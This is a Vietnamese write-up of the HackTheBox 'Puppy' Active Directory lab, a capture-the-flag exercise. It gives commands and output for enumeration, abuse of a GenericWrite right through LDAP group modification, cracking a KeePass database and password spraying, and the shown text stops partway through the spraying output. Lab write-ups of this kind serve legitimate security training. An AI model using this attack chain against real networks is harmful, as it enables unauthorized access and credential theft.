image.png

Về thông tin

Thông tin chung IP Address : 10.10.11.70
Hệ điều hành (Distribution) Microsoft Windows Server 2022 Standard
Kernel OS Version 10.0.20348 N/A Build 20348
Phần mềm Web Server và Version Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Port Available 53, 88, 111, 135, 139, 389, 445, 464, 593, 636, 2049, 3260, 3268, 3269, 5985

Enumeration (Thu thập dữ liệu)

1
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Ở đây tr3nb0lone (machine creator) đã để sẵn tên người dùng và mật khẩu được cung cấp như sau

  • User: levi.james
  • Password: KingofAkron2025!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 15:00 EDT
Nmap scan report for 10.10.11.70
Host is up (0.097s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 02:00:50Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-SiteName)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2025-05-18T02:02:51
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 96.82 ms 10.10.11.70
2 96.78 ms 10.10.11.70

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.71 seconds

Sử dụng CrackMapExec để quét (scan) người dùng, tận dụng thông tin tài khoản và mật khẩu đã có.

1
2
3
4
5
6
7
8
9
10
11
12
13
> crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --users
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB 10.10.11.70 445 DC [+] Enumerated domain user(s)
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:
SMB 10.10.11.70 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution Center Service Account
SMB 10.10.11.70 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.70 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in account for administering the computer/domain

Thêm DC.PUPPY.HTBPUPPY.HTB (tên miền và domain controller) vào tệp /etc/hosts.

1
10.10.11.70 DC.PUPPY.HTB PUPPY.HTB

Tách danh sách người dùng và ghi vào một tệp users.txt.

1
2
3
4
5
6
7
8
9
10
11
12
> nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print$2}' | awk '{print $1}' > users.txt
> cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

Thêm địa chỉ IP của domain controller vào tệp /etc/resolv.conf và thực hiện quét bằng bloodhound-python.

1
> nano /etc/resolv.conf
1
2
3
4
nameserver 10.10.11.70
nameserver 8.8.8.8
nameserver 1.1.1.1
nameserver 192.168.0.1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
> bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 19S

image.png

Người dùng của chúng ta có quyền GenericWrite đối với nhóm Developers, nhưng không thể tiếp tục khai thác với quyền này, vì vậy cần tìm kiếm sâu hơn.

Exploitation (Advance Hacking)

Sử dụng CrackMapExec để liệt kê danh sách các thư mục chia sẻ (file shares) hiện có.

1
2
3
4
5
6
7
8
9
10
11
12
> crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --shares
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [+] Enumerated shares
SMB         10.10.11.70     445    DC               Share           Permissions     Remark
SMB         10.10.11.70     445    DC               -----           -----------     ------
SMB         10.10.11.70     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.70     445    DC               C$                              Default share
SMB         10.10.11.70     445    DC               DEV             READ            DEV-SHARE for PUPPY-DEVS
SMB         10.10.11.70     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.70     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.70     445    DC               SYSVOL          READ            Logon server share

Sử dụng CrackMapExec để liệt kê danh sách các group hiện có.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
> crackmapexec smb 10.10.11.70 -u levi.james -p 'KingofAkron2025!' --groups
SMB         10.10.11.70     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB         10.10.11.70     445    DC               [+] PUPPY.HTB\levi.james:KingofAkron2025! 
SMB         10.10.11.70     445    DC               [+] Enumerated domain group(s)
SMB         10.10.11.70     445    DC               DEVELOPERS                               membercount: 4
SMB         10.10.11.70     445    DC               Access-Denied Assistance Users           membercount: 0
SMB         10.10.11.70     445    DC               SENIOR DEVS                              membercount: 1
SMB         10.10.11.70     445    DC               HR                                       membercount: 1
SMB         10.10.11.70     445    DC               DnsUpdateProxy                           membercount: 0
SMB         10.10.11.70     445    DC               DnsAdmins                                membercount: 0
SMB         10.10.11.70     445    DC               Enterprise Key Admins                    membercount: 0
SMB         10.10.11.70     445    DC               Key Admins                               membercount: 0
SMB         10.10.11.70     445    DC               Protected Users                          membercount: 0
SMB         10.10.11.70     445    DC               Cloneable Domain Controllers             membercount: 0
SMB         10.10.11.70     445    DC               Enterprise Read-only Domain Controllers  membercount: 0
SMB         10.10.11.70     445    DC               Read-only Domain Controllers             membercount: 0
SMB         10.10.11.70     445    DC               Denied RODC Password Replication Group   membercount: 8
SMB         10.10.11.70     445    DC               Allowed RODC Password Replication Group  membercount: 0
SMB         10.10.11.70     445    DC               Terminal Server License Servers          membercount: 0
SMB         10.10.11.70     445    DC               Windows Authorization Access Group       membercount: 1
SMB         10.10.11.70     445    DC               Incoming Forest Trust Builders           membercount: 0
SMB         10.10.11.70     445    DC               Pre-Windows 2000 Compatible Access       membercount: 1
SMB         10.10.11.70     445    DC               Account Operators                        membercount: 0
SMB         10.10.11.70     445    DC               Server Operators                         membercount: 0
SMB         10.10.11.70     445    DC               RAS and IAS Servers                      membercount: 0
SMB         10.10.11.70     445    DC               Group Policy Creator Owners              membercount: 1
SMB         10.10.11.70     445    DC               Domain Guests                            membercount: 0
SMB         10.10.11.70     445    DC               Domain Users                             membercount: 0
SMB         10.10.11.70     445    DC               Domain Admins                            membercount: 1
SMB         10.10.11.70     445    DC               Cert Publishers                          membercount: 0
SMB         10.10.11.70     445    DC               Enterprise Admins                        membercount: 1
SMB         10.10.11.70     445    DC               Schema Admins                            membercount: 1
SMB         10.10.11.70     445    DC               Domain Controllers                       membercount: 0
SMB         10.10.11.70     445    DC               Domain Computers                         membercount: 0
SMB         10.10.11.70     445    DC               Storage Replica Administrators           membercount: 0
SMB         10.10.11.70     445    DC               Remote Management Users                  membercount: 2
SMB         10.10.11.70     445    DC               Access Control Assistance Operators      membercount: 0
SMB         10.10.11.70     445    DC               Hyper-V Administrators                   membercount: 0
SMB         10.10.11.70     445    DC               RDS Management Servers                   membercount: 0
SMB         10.10.11.70     445    DC               RDS Endpoint Servers                     membercount: 0
SMB         10.10.11.70     445    DC               RDS Remote Access Servers                membercount: 0
SMB         10.10.11.70     445    DC               Certificate Service DCOM Access          membercount: 0
SMB         10.10.11.70     445    DC               Event Log Readers                        membercount: 0
SMB         10.10.11.70     445    DC               Cryptographic Operators                  membercount: 0
SMB         10.10.11.70     445    DC               IIS_IUSRS                                membercount: 0
SMB         10.10.11.70     445    DC               Distributed COM Users                    membercount: 0
SMB         10.10.11.70     445    DC               Performance Log Users                    membercount: 0
SMB         10.10.11.70     445    DC               Performance Monitor Users                membercount: 0
SMB         10.10.11.70     445    DC               Network Configuration Operators          membercount: 0
SMB         10.10.11.70     445    DC               Remote Desktop Users                     membercount: 0
SMB         10.10.11.70     445    DC               Replicator                               membercount: 0
SMB         10.10.11.70     445    DC               Backup Operators                         membercount: 0
SMB         10.10.11.70     445    DC               Print Operators                          membercount: 0
SMB         10.10.11.70     445    DC               Guests                                   membercount: 2
SMB         10.10.11.70     445    DC               Users                                    membercount: 3
SMB         10.10.11.70     445    DC               Administrators                           membercount: 4

Chúng ta có thư mục DEV được chia sẻ, sẽ thử truy cập vào đó.

1
2
3
4
5
> smbclient \\\\10.10.11.70\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*

Okay ở đây ta thấy được rằng ta không có quyền truy cập vào thư mục DEV, giờ ta phải tự cấp quyền cho chính user levi.james để lấy được quyền truy cập

Trước hết ta phải tìm Distinguished Name (DN) của nhóm DEVELOPERSlevi.james. Để thêm levi.james vào nhóm DEVELOPERS bằng ldapmodify, sử dụng ldapsearch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
> ldapsearch -H ldap://10.10.11.70 -D "levi.james@PUPPY.HTB" -w 'KingofAkron2025!' -b "DC=PUPPY,DC=HTB" "(sAMAccountName=DEVELOPERS)" distinguishedName
# extended LDIF
#
# LDAPv3
# base <DC=PUPPY,DC=HTB> with scope subtree
# filter: (sAMAccountName=DEVELOPERS)
# requesting: distinguishedName 
#

# DEVELOPERS, PUPPY.HTB
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
distinguishedName: CN=DEVELOPERS,DC=PUPPY,DC=HTB

# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Ta cần biết DN của cả nhóm và tài khoản

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
> ldapsearch -H ldap://10.10.11.70 -D "levi.james@PUPPY.HTB" -w 'KingofAkron2025!' -b "DC=PUPPY,DC=HTB" "(sAMAccountName=levi.james)" distinguishedName
# extended LDIF
#
# LDAPv3
# base <DC=PUPPY,DC=HTB> with scope subtree
# filter: (sAMAccountName=levi.james)
# requesting: distinguishedName 
#

# Levi B. James, MANPOWER, PUPPY.HTB
dn: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB
distinguishedName: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

# search reference
ref: ldap://ForestDnsZones.PUPPY.HTB/DC=ForestDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://DomainDnsZones.PUPPY.HTB/DC=DomainDnsZones,DC=PUPPY,DC=HTB

# search reference
ref: ldap://PUPPY.HTB/CN=Configuration,DC=PUPPY,DC=HTB

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Về việc thêm levi.james vào nhóm DEVELOPERS, ta buộc phải tạo một file LDIF (dựa theo việc user này có quyền GenericWrite) theo cú pháp sau dưới 1 tệp LDIF (ở đây tôi dùng levi_to_dev.ldif):

1
2
3
4
dn: CN=DEVELOPERS,DC=PUPPY,DC=HTB
changetype: modify
add: member
member: CN=Levi B. James,OU=MANPOWER,DC=PUPPY,DC=HTB

Sau khi áp dụng thành công và chạy ldapmodify, bạn sẽ thấy thông báo như modifying entry "CN=DEVELOPERS,CN=Users,DC=PUPPY,DC=HTB".

1
2
3
> ldapmodify -H ldap://10.10.11.70 -D "levi.james@PUPPY.HTB" -w 'KingofAkron2025!' -f levi_to_dev.ldif      
modifying entry "CN=DEVELOPERS,DC=PUPPY,DC=HTB"

Ta thử lại việc truy cập vào thư mục DEV via qua smbclient 1 lần nữa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
> smbclient //10.10.11.70\\DEV -U "levi.james"                                   
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Mar 23 15:07:57 2025
  ..                                  D        0  Sun Mar  9 00:52:57 2025
  KeePassXC-2.7.9-Win64.msi           A 34394112  Sun Mar 23 15:09:12 2025
  Projects                            D        0  Sun Mar  9 00:53:36 2025
  recovery.kdbx                       A     2677  Wed Mar 12 10:25:46 2025

                5080575 blocks of size 4096. 1617649 blocks available
smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \>

Okay lần này đã thành công. Tiếp tục ta download và thử bẻ khóa (crack) tệp recovery.kdbx.

1
2
3
4
5
6
7
8
9
10
11
12
> apt install keepassxc
> wget https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh
> chmod +x keepass4brute.sh

> ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute

[+] Words tested: 36/14344392 - Attempts per minute: 102 - Estimated time remaining: 13 weeks, 6 days
[+] Current attempt: liverpool

[*] Password found: liverpool

Đã tìm thấy mật khẩu"liverpool“.

Trích xuất mật khẩu và dữ liệu từ tệp recovery.kdbx sang định dạng XML vào tệp keepass_dump.xml

1
2
3
4
5
6
7
8
9
10
11
> keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml
Enter password to unlock recovery.kdbx: liver...

> ll
total 32
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt

Bây giờ, đọc tệp keepass_dump.xml.

1
2
3
4
5
6
7
8
9
10
11
> head keepass_dump.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<KeePassFile>
 <Meta>
 <Generator>KeePassXC</Generator>
 <DatabaseName>recovery</DatabaseName>
 <DatabaseNameChanged>HqBg3w4AAAA=</DatabaseNameChanged>
 <DatabaseDescription>recover AD members, incase of lost credentials</DatabaseDescription>
 <DatabaseDescriptionChanged>HqBg3w4AAAA=</DatabaseDescriptionChanged>
 <DefaultUserName/>
 <DefaultUserNameChanged>+Z9g3w4AAAA=</DefaultUserNameChanged>

Sử dụng script để trích xuất tên người dùng và mật khẩu từ bản export XML của KeePass.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
> cat extract_keepass.py
import xml.etree.ElementTree as ET
tree = ET.parse('keepass_dump.xml')
root = tree.getroot()
for entry in root.iter('Entry'):
 username = None
 password = None
 for string in entry.findall('String'):
 key = string.find('Key').text
 value = string.find('Value').text
 if key == 'UserName':
 username = value
 elif key == 'Password':
 password = value
 if username or password:
 print(f"User: {username}, Password: {password}")

Lưu các mật khẩu đã trích xuất vào tệp passwords_only.txt.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
> python3 extract_keepass.py | awk -F'Password: ' '{print $2}' > passwords_only.txt

> ll
total 40
-rw-rw-r-- 1 kali kali 498 May 17 15:54 extract_keepass.py
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack
-rw-rw-r-- 1 kali kali 99 May 17 15:55 passwords_only.txt
-rw-rw-r-- 1 kali kali 0 May 17 15:53 passwords.txt
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt

> cat passwords_only.txt
JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!

Sử dụng CrackMapExec để thực hiện tấn công phun mật khẩu(password spraying).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
> crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
